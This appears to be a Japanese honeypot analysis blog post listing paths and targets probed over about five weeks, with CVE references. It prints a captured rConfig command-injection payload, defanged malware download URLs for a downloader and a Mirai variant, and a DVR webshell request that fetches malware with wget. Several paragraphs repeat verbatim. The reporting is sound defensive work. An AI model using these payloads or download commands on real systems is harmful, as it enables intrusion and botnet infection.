【ハニーポット簡易分析】Honeypot簡易分析(10/11-11/16)
かなり、久々の更新となってしました。
一部、こちらの手違いでログの欠損が発生してまい、WoWHoneypotおよびHoneytrapのログがロストしてしまいましたので、WoWHoneypotのみの更新となります。
一部、こちらの手違いでログの欠損が発生してまい、WoWHoneypotおよびHoneytrapのログがロストしてしまいましたので、WoWHoneypotのみの更新となります。
◾️WoWHoneypot
<国別検知数および検知数>
<検知パス一覧>
| target | count |
| WordPress | 1639 |
| - | 876 |
| FreePBX | 438 |
| txt | 116 |
| Admin config | 113 |
| Tomcat | 76 |
| phpMyAdmin | 43 |
| ThinkPHP | 41 |
| Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API | 32 |
| Unauthorized Relay | 14 |
| Webshell | 11 |
| phpMyAdmin | 10 |
| a2billing | 8 |
| Nmap | 7 |
| D-Link DIR-850L | 3 |
| consul | 3 |
| Vmware | 2 |
| .env file | 1 |
| ASUS | 1 |
| Drupal | 1 |
| IPC | 1 |
| Login Page | 1 |
| MySQL | 1 |
| Outlook 2016 Autodiscover | 1 |
| Scannero | 1 |
| Trane Tracer SC | 1 |
| rConfig | 1 |
<rConfig の脆弱性>
CVE-2019-16663 および CVE-2019-16662
検知ペイロード
/install/lib/ajaxhandlers/ajaxserversettingschk.php?rootuname=;echo -n hellorconfig|md5sum #
→rootuname=;以降のペイロードが実行されます。今回のコマンドはechoコマンドでhellorconfigのmd5のハッシュ値を求めるものとなります。ハッシュ値が表示される=攻撃成功なので、ハッシュ値が表示されれば、その後の攻撃に移行すると推測されます。
<マルウェアダウンロード>
hxxp://fky[.]dfg45dfg45[.]best/download[.]exe
https://www.virustotal.com/gui/file/7ee4f2381f5e06e3808455bec411ba1735688ee9269ce74d1ef1cd9fa0bee95f/detection
→Downloader
リクエスト:GET /FxCodeShell.jsp
Webshellにてダウンローダをインストールさせることを狙った攻撃
hxxp://5[.]206[.]227[.]65/arm7[.]tsunami
https://www.virustotal.com/gui/file/4a3e9fd386272aadc1d15157cad96db4ed1c41ef44f28b04eea4310dd4ae4439/detection
→Mirai亜種 tsunami
hxxp://fky[.]dfg45dfg45[.]best/download[.]exe
https://www.virustotal.com/gui/file/7ee4f2381f5e06e3808455bec411ba1735688ee9269ce74d1ef1cd9fa0bee95f/detection
→Downloader
リクエスト:GET /FxCodeShell.jsp
Webshellにてダウンローダをインストールさせることを狙った攻撃
hxxp://5[.]206[.]227[.]65/arm7[.]tsunami
https://www.virustotal.com/gui/file/4a3e9fd386272aadc1d15157cad96db4ed1c41ef44f28b04eea4310dd4ae4439/detection
→Mirai亜種 tsunami
リクエスト:GET /shell?cd+/tmp;rm+-rf+.t;wget マルウェアURL
MVPower DVRなどのIoT機器への攻撃を狙った通信であり、Mirai亜種への感染を狙ったものでした。(やはり、IoT系はMirai系のダウンロードが多いですね。。。)
MVPower DVRなどのIoT機器への攻撃を狙った通信であり、Mirai亜種への感染を狙ったものでした。(やはり、IoT系はMirai系のダウンロードが多いですね。。。)
<検知パス一覧>
| path | target | CVE | reference | count |
| /editBlackAndWhiteList | Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API | - | https://github.com/mcw0/PoC/blob/master/TVT-PoC.py | 8 |
| /myadmin/scripts/setup.php | phpMyAdmin | - | - | 8 |
| /pma/scripts/setup.php | phpMyAdmin | - | - | 8 |
| /recordings/theme/main.css | FreePBX | - | - | 4 |
| /recordings/theme/main.css | FreePBX | - | https://github.com/crazedr0m/FreePBX/blob/master/upgrades/2.8.1.md5 | 4 |
| /admin/i18n/readme.txt | - | - | - | 2 |
| /admin/i18n/readme.txt | txt | - | - | 2 |
| / | - | - | - | 1 |
| / index.php | - | - | - | 1 |
| / l.php | Webshell | - | - | 1 |
| / phpinfo.php | - | - | - | 1 |
| /.env | .env file | - | - | 1 |
| /// | - | - | - | 1 |
| ///wp-json/wp/v2/users/ | WordPress | - | - | 1 |
| //MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| //myadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| //phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| //phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| //pma/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /Autodiscover/Autodiscover.xml | Outlook 2016 Autodiscover | - | - | 1 |
| /FxCodeShell.jsp | Webshell | - | - | 1 |
| /HNAP1 | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
| /HNAP1/ | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 | 1 |
| /Login.htm | - | - | - | 1 |
| /MyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /Nmap/folder/check1573311458 | Nmap | - | - | 1 |
| /Nmap/folder/check1573531681 | Nmap | - | - | 1 |
| /NmapUpperCheck1573311458 | Nmap | - | - | 1 |
| /NmapUpperCheck1573531681 | Nmap | - | - | 1 |
| /Pages/login.htm | - | - | - | 1 |
| /TP/public/index.php | ThinkPHP | - | - | 1 |
| /a2billing/admin/Public/index.php | a2billing | - | http://www.asterisk2billing.org/ | 1 |
| /a2billing/customer/templates/default/css/menu.css | FreePBX | - | https://n-lab.site/?p=494 | 1 |
| /admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 1 |
| /admin/config.php | Admin config | - | - | 1 |
| /admin/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /admin/pma/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /admin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /cgi-sys/defaultwebpage.cgi | - | - | - | 1 |
| /cpanel | - | - | - | 1 |
| /db/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /dbadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /evox/about | Trane Tracer SC | - | https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327 | 1 |
| /favicon.ico | - | - | - | 1 |
| /get_webdavInfo.asp | ASUS RT-AC | CVE-2017-5892 | https://wwwsnightwatchcybersecuritycom.files.wordpress.com/2017/10/bsides_fall_2017.pdf | 1 |
| /getip | - | - | - | 1 |
| /index.php | - | - | - | 1 |
| /install/lib/ajaxhandlers/ajaxserversettingschk.php | rConfig | CVE-2019-16663, CVE-2019-16662 | https://shells.systems/rconfig-v3-9-2-authenticated-and-unauthenticated-rce-cve-2019-16663-and-cve-2019-16662/ | 1 |
| /ipc$ | IPC | - | https://thinline196.hatenablog.com/entry/2018/09/23/153019 | 1 |
| /l.php | Webshell | - | - | 1 |
| /login/ | Login Page | - | - | 1 |
| /manager/html | Tomcat | - | - | 1 |
| /manager/text/list | Tomcat | - | https://tomcat.apache.org/tomcat-7.0-doc/manager-howto.html | 1 |
| /muieblackcat | Scanner | - | https://eromang.zataz.com/2011/08/14/suc027-muieblackcat-setup-php-web-scanner-robot/ | 1 |
| /mysql/scripts/setup.php | MySQL | - | - | 1 |
| /mysqladmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /nice ports,/Trinity.txt.bak | Nmap | - | https://dragos.com/blog/industry-news/threat-hunting-with-python-part-2-detecting-nmap-behavior-with-bro-http-logs/ | 1 |
| /nmaplowercheck1573311458 | Nmap | - | - | 1 |
| /nmaplowercheck1573531681 | Nmap | - | - | 1 |
| /phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /phpinfo.php | - | - | - | 1 |
| /phpmyadmin | phpMyAdmin | - | - | 1 |
| /phpmyadmin/ | phpMyAdmin | - | - | 1 |
| /phpmyadmin/ index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin// index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin// l.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin// phpinfo.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin//index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin//l.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin//phpinfo.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin//phpmyadmin/ index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin//phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin/index.php | phpMyAdmin | - | - | 1 |
| /phpmyadmin/scripts/setup.php | phpMyAdmin | - | - | 1 |
| /pmd/ index.php | phpMyAdmin | - | - | 1 |
| /pmd/index.php | phpMyAdmin | - | - | 1 |
| /robots.txt | - | - | - | 1 |
| /scripts/setup.php | phpMyAdmin | - | - | 1 |
| /sdk | Vmware | - | https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse | 1 |
| /shell | Webshell | - | - | 1 |
| /user/register/ | Drupal | CVE-2018-7600 | https://www.orangeitems.com/entry/2018/04/14/084205 | 1 |
| /v1/agent/self | consul | - | https://github.com/hashicorp/consul/blob/master/api/agent.go | 1 |
| /w00tw00t.at.blackhats.romanian.anti-sec:) | phpMyAdmin | - | - | 1 |
| /wp-admin/ | WordPress | - | - | 1 |
| /wp-login.php | WordPress | - | - | 1 |
| /xmlrpc.php | WordPress | - | - | 1 |
| 1 | ||||
| cn.bing.com:443 | Unauthorized Relay | - | - | 1 |
| hxxp://112[.]124.42.80:63435/ | Unauthorized Relay | - | - | 1 |
| hxxp://112[.]35.63.31:8088/index.php | Unauthorized Relay | - | - | 1 |
| hxxp://112[.]35.66.7:8088/index.php | Unauthorized Relay | - | - | 1 |
| hxxp://123[.]125.114.144/ | Unauthorized Relay | - | - | 1 |
| hxxp://www.123cha.com/ | Unauthorized Relay | - | - | 1 |
| hxxp://www.ip.cn/ | Unauthorized Relay | - | - | 1 |
| www[.]baidu.com:443 | Unauthorized Relay | - | - | 1 |
| www[.]ip.cn:443 | Unauthorized Relay | - | - | 1 |
| xui[.]ptlogin2.qq.com:443 | Unauthorized Relay | - |
- |
1 |
以上となります。
